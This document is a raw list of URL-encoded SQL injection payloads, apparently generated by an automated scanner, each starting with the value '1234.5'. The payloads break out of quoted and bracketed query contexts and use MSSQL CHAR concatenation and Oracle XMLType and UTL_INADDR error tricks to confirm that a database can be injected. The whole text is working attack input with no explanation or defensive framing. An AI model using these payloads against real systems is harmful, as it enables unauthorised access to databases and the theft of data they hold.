1234.5%22%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%22pisA%22%20LIKE%20%22pisA 1234.5%22%29%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22weXO%22%20LIKE%20%22weXO 1234.5%22%29%29%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22KRJC%22%20LIKE%20%22KRJC 1234.5%22%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%22kRSw%22%20LIKE%20%22kRSw 1234.5%29%20WHERE%206410%3D6410%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%27%29%20WHERE%202295%3D2295%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%27%20WHERE%202467%3D2467%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%22%20WHERE%205180%3D5180%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%27%20%7C%7C%20%28SELECT%207337%20FROM%20DUAL%20WHERE%205565%3D5565%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205843%20WHERE%202583%3D2583%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%208163%20FROM%20DUAL%20WHERE%207143%3D7143%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%29 1234.5%20%2B%20%28SELECT%202613%20WHERE%207136%3D7136%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27GOpU%27%20FROM%20DUAL%20WHERE%201306%3D1306%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27eouL%27%20WHERE%201470%3D1470%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%23 1234.5%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%27%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%27%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%22%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%289310%3D9310 1234.5%29%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%282940%3D2940 1234.5%29%29%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%286683%3D6683 1234.5%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%27%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27wQow%27%3D%27wQow 1234.5%27%29%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27BweP%27%3D%27BweP 1234.5%27%29%29%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27iknV%27%3D%27iknV 1234.5%27%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27WmhU%27%3D%27WmhU 1234.5%27%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27laYo%27%20LIKE%20%27laYo 1234.5%27%29%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27wnSd%27%20LIKE%20%27wnSd 1234.5%27%29%29%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27yxpK%27%20LIKE%20%27yxpK 1234.5%27%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27Qiib%27%20LIKE%20%27Qiib 1234.5%22%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22LbOp%22%3D%22LbOp 1234.5%22%29%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22yLFy%22%3D%22yLFy 1234.5%22%29%29%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22xbpe%22%3D%22xbpe 1234.5%22%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22HIdM%22%3D%22HIdM 1234.5%22%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22thNv%22%20LIKE%20%22thNv 1234.5%22%29%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22byqy%22%20LIKE%20%22byqy 1234.5%22%29%29%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22NDEN%22%20LIKE%20%22NDEN 1234.5%22%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22Bmza%22%20LIKE%20%22Bmza 1234.5%29%20WHERE%209932%3D9932%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%27%29%20WHERE%207396%3D7396%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%27%20WHERE%209167%3D9167%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%22%20WHERE%209239%3D9239%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1234.5%27%20%7C%7C%20%28SELECT%205896%20FROM%20DUAL%20WHERE%208657%3D8657%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204606%20WHERE%207664%3D7664%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%209777%20FROM%20DUAL%20WHERE%209019%3D9019%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29 1234.5%20%2B%20%28SELECT%206718%20WHERE%201710%3D1710%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27kXfx%27%20FROM%20DUAL%20WHERE%207386%3D7386%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27gqAx%27%20WHERE%209919%3D9919%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%204771%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284771%3D4771%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%23 1234.5%29%20AND%204640%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%29 